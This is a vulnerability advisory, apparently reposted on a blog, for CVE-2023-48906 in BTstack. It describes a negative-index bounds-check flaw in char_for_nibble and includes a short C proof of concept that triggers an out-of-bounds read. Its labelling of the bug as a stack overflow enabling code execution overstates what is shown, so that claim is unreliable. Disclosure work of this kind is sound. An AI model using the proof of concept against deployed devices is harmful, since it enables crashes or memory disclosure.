CVE-2023-48906
github:https://github.com/bluekitchen/btstack/issues/546
The name of an affected Product:
BTstack
The affected or fixed version(s):
version <= v1.6
CVE ID
CVE-2023-48906
Vulnerability Type
Stack overflow
Description & Root Cause
In the btstack source code, we can find an interesting piece of code.
char char_for_nibble(int nibble){
static const char * char_to_nibble = "0123456789ABCDEF";
if (nibble < 16){
return char_to_nibble[nibble];
} else {
return '?';
}
}
static inline char char_for_high_nibble(int value){
return char_for_nibble((value >> 4) & 0x0f);
}
static inline char char_for_low_nibble(int value){
return char_for_nibble(value & 0x0f);
}
The parameter "value" passed to the function "char_for_high_nibble" in the btstack source code is of type int. However, after the XOR operation, it is possible for "value" to become a negative number. In this case, the if statement inside the "char_for_nibble" function will not function as expected.
if (nibble < 16){
return char_to_nibble[nibble];
} else {
return '?';
}
As a result, we can access additional content of the char_to_nibble array, causing a stack overflow.
Here is the POC code.
#include <stdbool.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <math.h>
typedef uint8_t u8;
typedef uint16_t u16;
typedef uint32_t u32;
typedef uint64_t u64;
typedef unsigned int usize;
typedef int8_t i8;
typedef int16_t i16;
typedef int32_t i32;
typedef int64_t i64;
typedef int isize;
typedef float f32;
typedef double f64;
int main() {
i32 v0 = -2147483643; // nibble
i8 v1 = char_for_nibble(v0); // $target
}
Impact
The hazards of stack overflow include the following aspects:
Code Execution Control: A local stack overflow vulnerability can allow an attacker to manipulate the program's execution flow by carefully crafting malicious input. By overflowing the stack and overwriting critical control data, such as function return addresses, an attacker can gain control over the program's execution. This control can be used to redirect the program's flow to malicious code, enabling unauthorized operations and exploitation of other security vulnerabilities.
Denial of Service (DoS): Stack overflow vulnerabilities can also lead to denial of service attacks, causing the target system to crash or become unresponsive. By sending specific malicious input, an attacker can trigger a stack overflow, causing the program to crash or enter an infinite loop, depleting system resources and rendering the system unresponsive.
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 清华大学推出第四讲使用 DeepSeek + DeepResearch 让科研像聊天一样简单!
· 推荐几款开源且免费的 .NET MAUI 组件库
· 实操Deepseek接入个人知识库
· 易语言 —— 开山篇
· Trae初体验